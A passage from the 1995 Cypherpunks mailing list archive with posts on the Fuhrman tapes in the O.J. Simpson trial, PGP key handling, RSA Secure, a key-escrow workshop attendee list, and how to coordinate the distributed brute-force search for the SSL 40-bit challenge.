only appeared to be puffing himself up, a la a Wambaugh wannabee, then why
are his "racist" and "sexist" comments deemed so important as to have
derailed the trial for the last couple of weeks?

I have said an awful lot of inflammatory things at Cypherpunks meetings, at
parties, in political discussions, and so forth. I don't claim that there
should be a law against people bringing these issues up, or even a law
against tape-recording various kinds of meetings. I just argue that we are
devolving into a surveillanc

To be sure, there are valid trial issues:

-- Did he misspeak, misremember, or lie when he said he had "never" used
the word "nigger" in the past 10 years? (I recall at the time, circa
Feb-March, thinking to myself "Oh, sure!," when he said he had not used the
word nigger in the past 10 years.)

-- If this is perjury, how does it affect other evidence? (I'm not a
lawyer, but I grok from the comments on CNN that this has to do with
whether his testimony was supportive of other evidence, "cumulative," and
related issues.)

-- Does this possible misspeaking, misremembering, or lying have anything
to do with whether he planted the bloody glove?

-- etc. There are various valid issues. Spending a few weeks on these
issues is another matter, though, IMHO. In my view, if I were the judge I'd
have forced this issue to be resolved in hours, not weeks.


Anyway, I am greatly disturbed by this "mining" of ancient comments, made
to a screenwriter.

Whether Fuhrman is a "racist" or not, this witch trial is a diversion from
the real issues.

And some real privacy issues are raised.

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 1 Sep 95 09:49:10 PDT
To: cypherpunks@toad.com
Subject: Re: SSL search attack
In-Reply-To: <9509011325.AA20856@spirit.aud.alcatel.com>
Message-ID: <9509011648.AA07795@alpha>
MIME-Version: 1.0
Content-Type: text/plain



 > > > ACK ACK
 > > ACK
 > > > ACK
 > ACK


I've just kinda been watching this debate for a while, so I may well
have missed some of the more interesting details; if so, I apologize
for my noise in advance.

I work on a lot of commercial software under constraints of
scalability much like the SSL "attack server" being discussed here.
My instincts tell me that in this situation the whole process would be
*much* simpler if the basic idea of keeping the central server (or
the family of distributed servers in those models) completely
"informed" by all the attacking clients were abandoned.

Tim May's "random attack" idea was extremely attractive, I thought.
However, I think that it'd be possible to take advantage of the fact
that the keyspace itself is basically constant (until the keysize is
increased in the protocol under attack, of course).  I mean, 40 bits
is 40 bits.  Similarly, the capacity of most clients will be fairly
consistent.  (I have access (in theory, of course; don't mention this
to my management) (hi todd) to a hundred or so CPU's here, and that
doesn't really change too often.)

Rather than apportion the search space out dynamically on each attack,
why not simply allow attack clients to "subscribe" on a semi-permanent
basis?  All the server would have to do is make batches of ciphertext
available for cracking.  When a request comes in from a subscriber for
a copy of some ciphertext, the server knows (or at least can
legitimately suspect) that that subscriber's already-known keyspace
will be searched.

As far as getting acknowledgements of search completion, again the
server can by inference assume that (based on the prior establishment
of client capabilities) after a pre-determined period of time the key
sub-space will have been searched.  It might be appropriate for
clients to send back NACK messages, in case for example somebody shuts
down the client's network unexpectedly.  Assuming this goes pretty
smoothly one would hope that the number of failures would be
considerably smaller than the number of successs.

Again, ignore me if I'm blind to something obvious.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Fri, 1 Sep 95 09:57:15 PDT
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: SSL search attack
In-Reply-To: <9509011225.AA20540@spirit.aud.alcatel.com>
Message-ID: <9509011655.AA11645@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Daniel R. Oelke writes
>The only way this can work is if the server is told it is a 50%/75%/etc
>size ACK, and then latter the server is ACKed for the full 100%. 
>
>Why?  Because what happens if the client dies immediately after doing 
>the ACK - maybe only 51% of that space has been searched, yet 
>the server has already seen an ACK for it.
>
>IMO - a % ACK is to much complexity and extra work on the server,
>which is already having trouble keeping up.

I agree.  ACKing partial segments is a bad idea.  But, when a client
is given a block of segments, partial ACKing can let poorly connected
clients communicate with the server via e-mail, and still stay busy.
When the client completely finishes half of its segments, it ACKs them
and asks for that many more segments.  The fraction can be adjusted as
mean communications latency to the server is measured.  Ideally the
new segments arrive just as the client finishes the second half of its
original segments.  This way the segments are allocated as late as
possible, letting better connected clients have a better shot at them.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 1 Sep 95 12:15:40 PDT
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: O.J. ObCrypto:  Fuhrman's Folly Fans Fakery Fears...
Message-ID: <199509011912.MAA29475@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>I do not think that PGP 2.x can easily (ie: Automatically) use one key for
>Signing and another for Encrypting a Message (it does both at the same time
>if you ask). If I "Clear Sign" a message and then Encrypt it, then I get
>the result but I'm not sure if doing the decrypt on such a message will
>automatically spot the signature and verify it (as would occur with a E+S
>pass).

PGP identifies the key for decryption and signature checking from the message.
When you're signing a message or key, you can pick which of your keys to
use with the -u option.  The difficulty is getting people to use your
encryption key instead of your signature key when encrypting stuff for you.
Derek mentioned one approach (get people to load the encryption key first);
unfortunately, you can't predict their behavior, and if you change encryption
keys more often than signature keys, they'll load the newest encryption key
last.
Another approach is to identify them in the names - my key certification key
says "KeyCert-only" in the text.

For the problem that started this discussion, though, there's no good solution.
Since the Bad Guys _can_ encrypt a message to you with your signature key,
and send it to you by anonymous remailer, they can plant a reason to suspect
that you may have evidence encrypted with that key.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 1 Sep 95 12:15:26 PDT
To: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Subject: Re: Some details on RSA Secure
Message-ID: <199509011912.MAA29501@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:48 AM 8/31/95 PST, "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)> wrote:
>Here are my biased comments on RSA Secure.  They are biased by
>the fact that I an a techie who works for RSA Data Security.
>Neatest Features:
>- It is integrated with the File Manager on Windows and the
>  Finder on Mac System 7.

It's an interesting approach - simpler than installing as a file system
(I'm not using SecDrv because it needs a separate partition),
but so far it seems relatively useable.  On the other hand,
since there are file types it refuses to encrypt, like DLLs,
there are some things it can't protect (like DLLs with passwords
embedded in them.)

>- A settable list of files can be automatically decrypted (or
>  encrypted) on system startup (or shutdown).

I've got mixed feelings about this - since my password has normally
timed out by the time I shut down, it demands a password before
shutting down, and if I had any large amount of data there,
I assume it would take a while to reencrypt on my 386-box.
(Laptops are generally slower than similar-age desktops,
and you often want to shut them down quickly, even when
they aren't shutting themselves down to save power.)
I haven't tried powering it off during this process, but I assume
that at best the files would be unencrypted and at worst there'd
be one half-decrypted and sitting in limbo to be trashed the
next time the system starts up?

>Technical Features:
>- The user's passphrase unlocks a master key that is used to unlock
>  the file encryption key for each file.

Since the documentation mentions 512-bit and 1024-bit RSA keys,
I'd guess that each file has a separate random RC4 key which is
stored in the file header, encrypted with the user and escrow
RSA keys plus the MD5 hash, plus the encrypted real filename?

(The alternative would be that the userpref.!!! file contains an
RC4 key encrypted with RSA, which is used to encrypt the file keys,
but that would lead to much shorter headers, and cracking that master
RC4 key would then allow cracking of all documents on the system,
so I'm guessing that's not the approach used.)

>Request for Improvements:

1) The "Emergency" menu item in the File Manager is annoying.
Could it be combined with the RSA menu item, eliminated, or
at least have the option of abbreviating the name?

2) Can keys and files be shared between multiple machines,
i.e. the same user keys on a desktop and laptop, so that
individual encrypted files can easily be moved back and forth?
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Poppler <lwp@mail.msen.com>
Date: Fri, 1 Sep 95 09:15:52 PDT
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: SSL search attack
In-Reply-To: <v02130508ac6c2efca958@[166.84.254.3]>
Message-ID: <Pine.BSD/.3.91.950901121028.7561A-100000@conch.aa.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Sep 1995, Robert A. Rosenberg wrote:

> I see nothing wrong with the concept of being allocated an initial chunk
> and having the scan software attempt to ACK it when 50% of it has been
> searched. A successful ACK would allow the releasing of a new chunk (in
> response) equal in size to the returned chunk. A failure of the Server to

The ACK process and the allocation process are separate, and should 
remain so.  They run on different servers, and they run as separate 
processes in the unix version of brloop.  A little tweaking of brloop 
could allow pre-fetching of the next segment to search, without any 
effect on the ACK process.  I dislike the idea of a client sending an ACK 
before it has searched the entire segment.

::::::::::::::::::::::::::::::::::::::
:: Lou Poppler  <lwp@mail.msen.com> ::   No animals were harmed in the
::      http://www.msen.com/~lwp/   ::   production of this message.
::::::::::::::::::::::::::::::::::::::




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 1 Sep 95 10:22:29 PDT
To: Scott Brickner <sjb@austin.ibm.com>
Subject: Re: SSL search attack
In-Reply-To: <9509011648.AA07795@alpha>
Message-ID: <9509011721.AA07870@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
 > I think your assumption that available CPU is approximately constant
 > is incorrect.  Different participants have different constraints...

Hmm.  I suppose that's probably true for some more than others.
Again, hmm.

 > Also, the "subscription" process is somewhat discouraging to those
 > who participate for the prize.

Ah.  That looks like one of those little details that got by me.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rschp1.anu.edu.au>
Date: Thu, 31 Aug 95 19:27:21 PDT
To: cypherpunks@toad.com
Subject: sums with BIG numbers
Message-ID: <9509010227.AA28294@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Can anyone point me to any books, documentation or
whatever that will explain the methods used in routines
like bignum for doing sums with 'too-big' numbers.

I'm having a tough time trying to figure it out from the code 
;-(

Sherry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Mon, 2 Oct 95 12:44:03 PDT
To: cypherpunks@toad.com
Subject: Re: List latency.
Message-ID: <199510021942.MAA12424@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


As a non-crypto, latency-related, aside.  The USENET newsfeed coming out of
uunet to my ISP was non-existent last week.  It's improved somewhat, but is
still lagging behind by 2 or 3 days (never did this in the past).  uunet has
not provided my ISP with an explanation as to what is happening.  Perhaps
it's related to the delay in list messages appearing.  Unfounded speculation
has been the .edu sites are active again after the summer and are swamping
things.

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?

>It looks like there's a considerable delay entering and leaving uunet. I'm
not sure which 
>machine gets the blame, but it's either toad&uunet, or uunet&alcor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Sep 95 14:21:55 PDT
To: cypherpunks@toad.com
Subject: Re: Fuhrman needed a digital pseudonym!
Message-ID: <ac6cc467020210049bd1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:00 PM 9/1/95, Jeff Barber wrote:

>I don't see any "surveillance state" issue.  Fuhrman openly agreed to
>speak to the screenwriter.  AFAIK, he had no reason to believe the
>screenwriter wouldn't tell anyone else.  Nor should he have counted on
>that anyway.  Any loss of credibility (or other penalty) he receives
>is entirely deserved, IMO.

By the way, McKinny did not volunteer the tapes, nor did she consent to
having them taken from her and used by the Defense. Private property was
taken by a court action (the North Carolina lower court ruled that the
tapes were the property of McKinny and could not be taken, then an appeals
court overruled this decision and ordered McKinny to produce the tapes).

(It is not clear how Cochrane and his team learned of the tapes.
Speculation is that McKinny's agent or lawyer was doing some freelance
shopping-around of the script. McKinny has denied that she was trying to
sell the tapes. Regardless, they are her property and should only come in
to a court case when directly and centrally involved. This is closely
related to the Church of Scientology issue, and is being debated on another
mailing list I'm on, the Cyberia list.)

This raises serious issues. She was a screenwriter, Fuhrman was helping her
to generate a salable script. Neither was speaking for the LAPD. (Kind of
like the disclaimers we see on the Net, which I suspect are becoming
worthless.)


>> Anyway, I am greatly disturbed by this "mining" of ancient comments, made
>> to a screenwriter.
>
>Not me.  A few weeks there was a thread concerning the use of
>information by private "reputation" bureaus.  I can't find the thread
>in the archives but I seem to recall you defending the right of
>private entities to keep and distribute such information (my apologies
>if this was someone else).  Anyway, to me, these tapes fall clearly in

You're imputing to my comments about what will happen, and what cannot be
stopped except by coercion, a conclusion which you think is at odds with my
point here.

Just because I think people (like me, you, Laura McKinny, etc.) have the
"right" to compile records, make notes, make tapes of conversations, etc.,
does not mean I think that courts can order them given to the court. (This
is an issue I have with "discovery" in general, where even peripheral
witnesses can be compelled to turn over diaries, journals, letters, tapes,
records, financial reports, etc.)

>the same domain.  This screenwriter isn't a government agency, the
>information was freely given, and the screenwriter has every right to
>offer it for whatever purpose she deems appropriate, for free or
>for money (barring any agreements to the contrary, of which I have
>heard nothing).

Again, to make it clear, McKinney did not offer the material and fought in
the North Carolina courts to have her property kept confidential. The court
ordered her to turn it over.

(And apparently members of the defense team leaked the most damaging, and
out of context, parts, provoking Ito to announce a major investigation of
this is to come, with severe sanctions for those who leaked it.)

We need a justice system which will not be dragged into spending a full
year on this matter, with every indication that a mistrial or hung jury
will result. I look forward to a day in which an OJ would get a reasonable,
month-long trial...and then, if found guilty, be given an execution date no
longer than a month away.

As it is, OJ will be guesting on the talk show circuit. He butchers two
people--from the overwhelming mound of evidence I've seen--and essentially
cuts the head off of his ex-wife, but will likely get off as this trial
spins out of control and fragments in various ways.

Don't misunderstand my motivations: I'm sort of happy this is all
happening. It makes people even more suspicious of governments and lawyers,
and it will accelerate the disintegration of the current system.


--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkw@dataplex.net (Richard Wackerbarth)
Date: Fri, 1 Sep 95 12:47:20 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: SSL search attack
Message-ID: <v02130502ac6cddb40cbe@[199.183.109.242]>
MIME-Version: 1.0
Content-Type: text/plain


I wrote
>>> Assuming that you are multi-threaded--- Simply run two "workers" on the
>>> same machine. If there are delays in getting keys assigned, the two will
>>> soon get out of phase and keep the cpu busy.
>> I kind of like that idea...
>
To which Piete Brooks replied:
>I thought of that, but:
>1) for the same server load, it doubles the number of unACKed segments
>2) if process A is lagging process B, then when process B finishes and is idle
>   waiting for the server, process A will run faster and thus reduce the lag.
>   This will make the processes drift into phase.
>   I'm not convinced one way or the other.

But you forgot that when process A finishes, process B will run faster and
re-establish its lead.

The real question is what is the parameter that we need to minimize?

Assuming that the key is distributed in the keyspace with a uniform
probability, then what we need to minimize is the expectation that two or
more workers are searching the same keyspace.

As long as we never reach the point that all of the keys have been
distributed, it does not matter how many or in what method they are
assigned. (The "fairness" WRT a prize being ignored)

The assignments only become important as we exhaust the space and must
prepare to make another pass.
Note that we never got to that point on challenge 2. The assignment of the
block containing the key was processed on its first pass and the key was
found. In this regard, it is probably "best" to first attempt to identify
those space assignments that have been lost. If we associate with each key,
either explicitly, or by inference, an expected completion time, those
segments which are most overdue are certainly good candidates for having
been lost.

Based on our previous try, and the assumption that we would not have
extremely different resources available, the master allocator would not
NEED to get reports back for the first say 12 hours.
That is not to imply that reports should be delayed that long, but only
that there is considerable opportunity to have a hierarcy of intermediate
collectors that have plenty of time to adjust their allocation algorithms
to match the ability of their workers. Later, more rapid response would be
needed. When the required response becomes too small for the "little guys",
they could be sloughed off on the next problem, leaving the "big boys" to
clean up the last pieces.

Of course, the "next" problem might be to resolve the same problem because
the correct answer was incorrectly reported as not found.

As I see it, except for perhaps the fastest of machines there is little
reason to allocate to the workers more than one segment at a time. Their
supervisor can quickly respond to requests for work and consolidate the
results to be passed up the chain. The only reason that I can see to
separate the acks from the assignments is to be able to have "memory-less"
nodes. This is certainly unnecessary if there is a web of supervisor
servers.

I have a lot more thoughts that I will defer to the next missive.

Gotta' run...

----
Richard Wackerbarth
rkw@dataplex.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Fri, 1 Sep 95 15:13:26 PDT
To: don@cs.byu.edu
Subject: Re: Web of Trust
In-Reply-To: <199509011201.GAA01376@wero>
Message-ID: <Pine.BSD.3.91.950901150726.26786A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Sep 1995 don@cs.byu.edu wrote:

> I am requesting that all "active" cypherpunks/cyphergroupies please send me
> their key number, IF it's already on the keyservers. If it's recently put
> there, be sure to tell me or I will be annoyed. If it's not there at all,
> I'll be annoyed. Personally annoyed, not I-ran-some-scriptfile annoyed. If
> you searched any of the RC4 or SSL keyspace, for example, I'm interested.
> If you post messages occasionally, [conspiracypunks need not apply] I'm
> interested. If you generated a key because your neighbor taught you how,
> don't bother. 


Hi,

Please feel free to ad my key to your keychain and/or keyserver.

I am a cyberpunk in the most original sense.  From the early '80s the 
days of 8BBS & 414's, etc.   I am also in the book "CyberPunks" [now in 
your book store] see who signed my key, and you'll have a clue who I am.

Enjoy the key!


||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk
LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP
7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR
tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK
Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD
cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf
9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig=
=0Tlq
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: syrinx@c2.org (Syrinx Anonymous Remailer)
Date: Fri, 1 Sep 95 15:27:13 PDT
To: cypherpunks@toad.com
Subject: Re: CIA & Espionage
Message-ID: <199509012222.PAA13146@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


'Tatu Ylonen' was reported to have written:
 
> I do find it rather shocking that the most powerful country in the
> world sets industrial espionage as the primary task of their
> intelligence services.

Well, I have a letter from a United States Senator which was
received last year in response to my phone call in opposition
to the Digital Telephone Act of 1994 (S. 2375). Here's the interesting
part:

"According to the director of the Federal Bureau of Investigations
(FBI), Louis Freeh, the number one law enforcement, public
safety, and national security issue facing us today is preserving
the ability to conduct court approved wiretaps."

In other words, retaining the ability to monitor citizen communications
is their greatest concern. This should be more than shocking to
anyone who cares about privacy.

It appears as though the primary function of the FBI and the
"intelligence services" are similarly directed. One significant
distinction is that the FBI's stated mission is directed toward
the "owners of the country" (to borrow a term from Perot).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Fri, 1 Sep 95 07:29:05 PDT
To: cypherpunks@toad.com
Subject: Re: FUHRMAN key escrow
In-Reply-To: <199509011002.FAA28046@mail.socketis.net>
Message-ID: <Pine.HPP.3.91.950901160707.14946B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Gary Jeffers wrote:
>    Fuhrman seems to be a Godsend to us. He is helping to destroy the
> public's perceived legitimacy of state authority. If things keep moving
> the way they are, Fuhrman may join the names: John Crapper, Quisling,
> & Hooker. In which case, I propose the term, Fuhrman key escrow, to
> substitue for the term, mandatory state key escrow.

The issue is apparently also teaching the US public to use CODE:

'I don't give a f-wording s-word how many times this c-word-sucker
 said the n-word as long as the DNA-tests say that the other
 son-of-a-b-word did it.'

Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Fri, 1 Sep 95 13:28:27 PDT
To: cypherpunks@toad.com
Subject: Key Escrow Workshop agenda & discussion paper 3
Message-ID: <59234.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



The following message segment:
 ------------------------------
From: Arlene Carlton <carlton@micf.nist.gov>
Fri, 01 Sep 1995 15:30:46 -0400
Cc: carlton@micf.nist.gov
Subject: Key Escrow Workshop agenda & discussion paper 3


                                          September 1, 1995

Dear Participant:

       Thank you for agreeing to participate in the two-day meeting
on software key escrow encryption.  We are anxious to work with
you and other industry representatives to facilitate development
of exportable key escrow encryption in software products.  I look
forward to the workshop being an important step in that process.
[snip]
 ---------------------------------
 Was sent to the following folks. I assume that this means that
these people are participants.  I see Dan W from CDT, Soble from EPIC
and Whitfield Diffie, on our side, plus assorted folks with stakes
such as tis.com and netscape.com
And of course, DERD for the other side.

Blank Unicorn had posted to c'punks that he was attending. Of course,
while I know what he looks like, I have no idea which nym is his.

Pat

List of attendees/registered participants follows:
 100436.3361@compuserve.com,
 73167.2027@compuserve.com,
 73534.3011@compuserve.com,
 75300.3232@compuserve.com,
 76225.2603@compuserve.com,
 ablee@mitre.org,
 ads012@email.corp.mot.com,
 ams@eit.com,
 amte09@email.corp.mot.com,
 asteen@novell.com,
 baum@world.std.com,
 bekutz@aol.com,
 bflowe@mcimail.com,
 bill.poulos@oga.eds.com,
 bill.poulos@oga.eds.com,
 branstad@tis.com,
 bsaclu@aol.com,
 c.baggett@cablelabs.com,
 carol.donovan@network.com,
 ccrafton@gi.com,
 charlesabzug@acm.org,
 ckc@rfpo1.rfc.comm.harris.com,
 cmo@cohnmarks.com,
 coallen@us.oracle.com,
 cpadilla@attmail.com,
 cpadilla@attmail.com,
 csmith@steptoe.com,
 davery@grci.com,
 david_rose@ccm.fm.intel.com,
 ddodson@nist.gov,
 denning@cs.cosc.georgetown.edu,
 deyoung@rpcp.mit.edu,
 dinsmore@tis.com,
 djw@cdt.org,
 dkozlay@ire.com,
 dmiller@spa.org,
 Don_Sortor-ads012@email.corp.mot.com,
 ebarker@nist.gov,
 ed@tecsec.com,
 emessmer@world.std.com,
 ezzy_dabbish-amte09@email.corp.mot.com,
 flahavin@csmes.ncsl.nist.gov
 french@zeke.enet.dec.com,
 gomes@dockmaster.ncsc.mil,
 gordon@ipower.nsc.com,
 hoffman@seas.gwu.edu,
 housley@spyrus.com,
 hoydyshd@mcln.unisysgsg.com,
 i.goldsmith@nexor.co.uk,
 infocker@megaweb.com,
 jackk@microsoft.com,
 jag@jgvandyke.com,
 jaltman@milchev.com,
 jamanni@missi.ncsc.mil,
 james.hughes@network.com,
 jdrandall@vnet.ibm.com,
 jean_m_baronas@co.xerox.com,
 jeff.rulifson@Eng.Sun.COM,
 jeff@netscape.com,
 jerry@ods.com,
 jgheiner@aol.com,
 jimmy@ipower.nsc.com,
 jimn@calv1.cray.com,
 jkrauss@cpcug.org,
 john@ipower.nsc.com,
 john_pascatore@ivision.com,
 jroberts@cmp.com,
 js@cup.hp.com,
 jseiger@cdt.org,
 jwinston@ota.gov,
 jya@pipeline.com,
 jya@pipeline.com,
 kandy@micf.nist.gov,
 karen.randall@att.com,
 kawamoto@mitre.org,
 kaye@ix.netcom.com,
 kent_landfield@sterling.com,
 khrose@annap.infi.net,
 klensin@mci.net,
 lc2m@andrew.cmu.edu,
 lcarnahan@nist.gov,
 lhg@nrc.gov,
 lovornj@usva8.dyncorp.com,
 lshomo@hqops.hq.nasa.gov,
 lthrash@hqamc.army.mil,
 lydia.bell@tip.navsea.navy.mil,
 maitgmu@aol.com,
 martin.ferris@treas.sprint.com,
 mary_smolenski@ita.doc.gov,
 mbohannon@banyan.doc.gov,
 mccord@nosc.mil,
 melanie.carter-maguire@nt.com,
 mendelson@tis.com,
 mfa@compaq.com,
 michael.palgon@sciatl.com,
 mignon@atc.boeing.com,
 mikus@viacrypt.com,
 mjl@liii.com,
 mpapillo@snap.org,
 mpapillo@snap.org,
 mppulkk@mikropc.fi,
 mrainey@itic.nw.dc.us,
 murray2@vnet.ibm.com,
 natstrat@dgs.dgsys.com,
 nazario@csmes.ncsl.nist.gov,
 paradise@wellsfargo.com,
 pfarrell@netcom.com,
 pjclark@ix.netcom.com,
 po7114@email.mot.com,
 polk@csmes.ncsl.nist.gov,
 powar@visa.com,
 randy@mci.net,
 ravenis@novell.wd.cubic.com,
 rjg9324@glaxo.com,
 rjoconnor@aol.com,
 rmedlock@mitre.org,
 roberth@bsa.org,
 rolfe.doc.gov@micf.nist.gov,
 rozzie@iris.com,
 rwessman@us.oracle.com,
 sbaker@steptoe.com,
 Schneck@mitre.org,
 Schneck@ncsl.nist.gov,
 sevans@csn.com,
 shabbir@panix.com,
 simona@sea.org,
 sking@mitre.org,
 sltm@msg.ti.com,
 snouffer@st1.ncsl.nist.gov,
 sobel@epic.org,
 squires@arpa.mil,
 stuart@bellcore.com,
 stw@atc.boeing.com,
 sullivan@interramp.com,
 tajalli@tis.com,
 tec.teclgl@micf.nist.gov,
 ted_gerbracht@ml.com,
 tfuhrman@ostp.eop.gov,
 thomas_clare@sterling.com,
 trivers@is.ge.com,
 trstsc@tevm2.nsc.com,
 ttobin@atl.ge.com,
 wafranklin@attmail.com,
 walker@tis.com,
 walt@osf.org,
 walters@snad.ncsl.nist.gov,
 wford@bnr.ca,
 whitehurst@vnet.ibm.com,
 whitfield.diffie@Eng.Sun.COM,
 whpayne@abq-ros.com,
 wmcglone@milchev.com,
 wright@dockmaster.ncsc.mil,

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Fri, 1 Sep 95 08:50:47 PDT
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: SSL search attack
In-Reply-To: <9509011325.AA20856@spirit.aud.alcatel.com>
Message-ID: <"swan.cl.cam.:275380:950901154847"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>>>> I see nothing wrong with the concept of being allocated an initial chunk
>>>> and having the scan software attempt to ACK it when 50% of it has been
>>>> searched. A successful ACK would allow the releasing of a new chunk (in
>> You NEVER claim to have searched space until you have actually done so. 
> That is exactly what I was arguing against - but the first sentance of what
> I quoted was saying was ok.

No -- If you ask for 2 segments, then when you are 50% done, it is OK to ACK 
the *FIRST* segment.

>> Assuming that you are multi-threaded--- Simply run two "workers" on the
>> same machine. If there are delays in getting keys assigned, the two will
>> soon get out of phase and keep the cpu busy.
> I kind of like that idea...

I thought of that, but:
1) for the same server load, it doubles the number of unACKed segments
2) if process A is lagging process B, then when process B finishes and is idle
   waiting for the server, process A will run faster and thus reduce the lag.
   This will make the processes drift into phase.
   I'm not convinced one way or the other.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Sep 95 16:51:13 PDT
To: cypherpunks@toad.com
Subject: Surveillance a Growing Problem
Message-ID: <ac6cea0f00021004158f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(I've changed the thread name from "Fuhrman...." to the topic being
discussed here.)

At 10:56 PM 9/1/95, Buford Terrell wrote:

>If you've ever watched Not_at_all_Funny Home Videos or any of the
>American Urinal school of tabloid television, you soon start feeling
